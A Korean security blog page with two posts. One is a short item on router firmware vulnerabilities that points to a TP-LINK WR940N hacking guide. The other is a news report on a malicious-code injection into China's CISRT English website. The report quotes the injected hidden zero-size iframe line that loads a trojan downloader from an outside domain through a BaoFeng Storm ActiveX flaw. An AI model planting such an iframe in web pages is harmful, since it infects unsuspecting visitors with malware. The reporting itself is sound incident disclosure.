가정에서 인터넷을 사용할 경우에는 대부분 공유기(그것도 대부분 무선)를 이용하여 여러 대가 접속하여 이용하곤 한다.

 

이러한 공유기는 작은 형태의 리눅스와 같은 펌웨어를 이용하고, 관리 편의를 위해 웹페이지를 제공하는 경우가 많다.

 

문제는 웹페이지 즉 웹서비스 자체에도 취약점이 많이 있고, 펌웨어에도 상당히 많은 취약점이 있다.

 

아래 자료는 TP-LINK의 WR940N이라는 공유기 모델을 해킹하는 방법을 소개한다.

 

 

참고로, 국내에서는 KISA가 국내 공유기 제조사와 협의하여, 지속적으로 펌웨어의 업그레이드를 유도하고 있다는 점에서 칭찬받을 만한 좋은 사례이다.

 

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    각 나라별로는 정보 보안을 담당하는 기관들이 있으며, 이러한 기관 내에는 침해사고 대응팀, 보안 대응팀 등이 운영되고 있다.

    우리나라에서는 다음과 같은 기관이 있다.

    이 번에 수모를 당한 기관은 중국에서 운영하고 있는 CISRT(Chinese Internet Security Response Team)으로 영문 웹사이트가 해킹을 당한 것으로 알려졌다.

    CISRT 영문 웹사이트에는 다음과 같이 사과문이 게재되어 있다.

    ARP attack to CISRT.org

    We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.  

    The malicious codes are inserted into the top of some pages.
    <iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>


    This link is taken the use of the vulnerability of BaoFeng Storm MPS ActiveX. A file "sms.exe" will be downloaded from this domain, the size is 37,888 bytes, Kaspersky detects it as Trojan-Downloader.Win32.Baser.w.

    This trojan-downloader can download 20 trojans from ganbibi.com.

    We suggest everyone could block this two domains "nmmmn.com","ganbibi.com"

    사연은 이렇다. CISRT 웹사이트 중 영문 웹사이트의 일부 탑페이지에서 iframe 악성코드가 삽입되는 공격을 당했다. 이 웹사이트를 방문한 사람은 37Kb 크기의 "sms.exe"라는 실행 파일을 다운로드하게 한다. 이 파일은 카스퍼스키 안티바이러스에서는 "Troyan-Downloader.Win32.Baser.w"로 진단한다.

    중국에서 개발한 웹 브라우저 기반의 미디어 플레이어인 BaoFeng Storm의 버퍼오버플로 취약점으로 통해 공격이 이루어졌다. BaoFeng Storm은 ActiveX 컨트롤을 이용하여 제공되며, 이전에 이미 시만텍은 사용자가 입력한 값을 확인하는 부분이 제대로 동작하지 않아 여러 개의 버퍼오버플로 취약점이 존재한다고 밝혔다.

    CISRT는 웹 사이트가 해킹된 것이 아니라 "ARP" 공격의 이루어진 것으로 믿고 있다. "ARP" 공격은 최신 공격 기법 중의 하나로 ARP poisoning 또는 ARP spoofing 공격이라고도 한다.

    보안 벤더인 F-Secure의 패트릭 러날드(Patrik Runald)는 CISRT 웹사이트가 해킹 당한 것으로 보이며, ARP 공격이라고 한다면 꽤 복잡한 방법을 사용했을 것이라고 밝혔다.

    출처: http://www.zdnetasia.com/news/security/0,39044215,62032982,00.htm

    특히 국가에서 운영하는 보안 기관의 웹사이트는 일반인들이 아무런 의심없이 접속하는 사이트로 보안 상태가 가장 철저하게 유지되어야 하는데, 이러한 사고가 났다니 참 어이없는 일이 아닐 수 없다.

    우리나라 특히, 교육기관같은 정부기관은 외국의 해킹 앞마당 노릇을 하고 있는 형편이다. 이러한 점들을 보완해야 IT 강국으로서의 면모가 서지 않을까?

    Daum 블로거뉴스
    블로거뉴스에서 이 포스트를 추천해주세요.

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus


      Web Analytics Blogs Directory